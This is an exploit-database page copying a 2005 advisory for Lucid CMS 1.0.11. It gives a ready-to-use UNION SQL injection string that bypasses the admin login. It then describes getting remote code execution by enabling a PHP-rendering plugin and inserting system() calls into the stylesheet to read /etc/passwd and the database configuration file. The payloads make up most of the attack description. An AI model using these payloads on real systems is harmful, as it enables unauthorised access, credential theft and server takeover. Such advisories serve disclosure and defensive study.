Advertisement






Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution

CVE Category Price Severity
N/A CWE-89 $3000 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2005-10-06
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.37596 0.76475

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005090028

Below is a copy:

Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution

software:
site: http://lucidcms.net/
description:
lucidCMS is a simple and flexible content management system for the individual or
organization that wishes to manage a collection of web pages without the overhead
and complexity of other available "community" CMS options.

1) if magic quotes off -> SQL Injection:

you can login as admin typing in login form:

login: 'UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b204e98
00998ecf8427e','1')/*
pass: [nothing]                                                   ^
                                                                  |
                                                                  |
                                                            this is the hash of...nothing
                                                            the result of md5('');
note:"login" without spaces

the login query become:
SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b
204e9800998ecf8427e','1')/*'

2)
now new admin can edit template and insert evil javascript code, see the phpinfo(), manage users/groups,
activate/disable plugins, you can activate renderPHP plugin, add the following line at the end of
the main stylesheet:

<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>

to see /etc/passwd file

<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>

to see database username/password, the database name and table prefix... now you have the full control
of the database

rgod
site: http://altervista.org
mail: retrogod (at) aliceposta (dot) it [email concealed]
original advisory: http://rgod.altervista.org/lucidcms1011.html

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.